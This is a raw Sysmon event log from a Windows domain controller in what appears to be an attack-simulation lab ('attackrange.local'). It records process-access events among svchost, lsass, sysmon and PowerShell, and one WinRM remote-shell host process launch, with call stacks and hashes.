15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3D-5FA1-F802-000000008701}3044C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3D-5FA1-F802-000000008701}3044C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.301{D28789B6-7C3D-5FA1-F802-000000008701}3044C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C3D-5FA1-E3BE-100000000000}0x10bee30HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7AD1-5FA1-0C00-000000008701}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.201{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.201{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.201{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.201{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.201{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.185{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7C3E-5FA1-0103-000000008701}49881680C:\Windows\system32\conhost.exe{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 